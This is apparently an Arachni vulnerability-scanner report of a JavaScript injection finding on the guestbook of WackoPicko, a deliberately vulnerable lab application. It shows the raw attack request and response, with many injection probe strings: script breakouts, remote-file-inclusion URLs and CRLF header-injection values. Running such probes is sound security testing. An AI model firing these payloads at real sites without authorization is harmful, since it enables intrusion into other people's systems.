<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Injected seed Proof
1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();
1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<form action="/WackoPicko/guestbook.php" method="POST">
  Name:
  <br>
  </br>
  <input type="text" name="name">
  </input>
  <br>
  </br>
  Comment:
  <br>
  </br>
  <textarea id="comment-box" name="comment">
    
  </textarea>
  <br>
  </br>
  <input type="submit" value="Submit">
  </input>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/guestbook/ http://192.168.0.26/WackoPicko/guestbook.php
comment
name
comment
1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();
name
arachni_name
Transitions

Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.

# Time Event Element Options
0 0.640342 load page
URL http://192.168.0.26/WackoPicko/guestbook.php
1 0.099554 request http://192.168.0.26/WackoPicko/guestbook.php
2 0.099813 request http://192.168.0.26/WackoPicko/css/stylings.php

Execution-flow sinks

Execution-flow sinks log the successful execution of an injected Javascript payload within the page's Javascript environment. Each sink is a point of payload execution.

# Data
0

No helper data logged.

Inspect

HTTP request

Raw HTTP request used to retrieve the page.

POST /WackoPicko/guestbook.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72
Content-Length: 111
Content-Type: application/x-www-form-urlencoded

comment=1%3B%0Awindow.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink%28%29%3B&name=arachni_name
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:03 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1599
Content-Type: text/html

<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">1</p>
	<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot;// </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot; </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot;// </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot; </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
		<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
	<p> - by arachni_name </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
	<p> - by arachni_name </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
		<p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt; </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;,x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:&quot; </p>
		<p class="comment">1</p>
	<p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
		<p class="comment"></script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
	<p> - by arachni_name </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
	<p> - by arachni_name </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
	<p> - by arachni_name </p>
		<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
		<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1</p>
	<p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1</p>
	<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name </p>
		<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Browser-evaluated body

This is the browser-evaluated body, as a result of the listed transitions.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
<html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->


  
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login">
                  <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="">
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;">
          </form>
        </div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

        <p class="comment">1</p>
        <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">1</p>
        <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p>
                <p class="comment">1</p>
        <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
                <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
        <p> - by arachni_name </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
                <p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt; </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p>
                <p class="comment">1</p>
        <p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
                <p class="comment">
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
        <p> - by arachni_name </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
        <p> - by arachni_name </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
        <p> - by arachni_name </p>
                <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
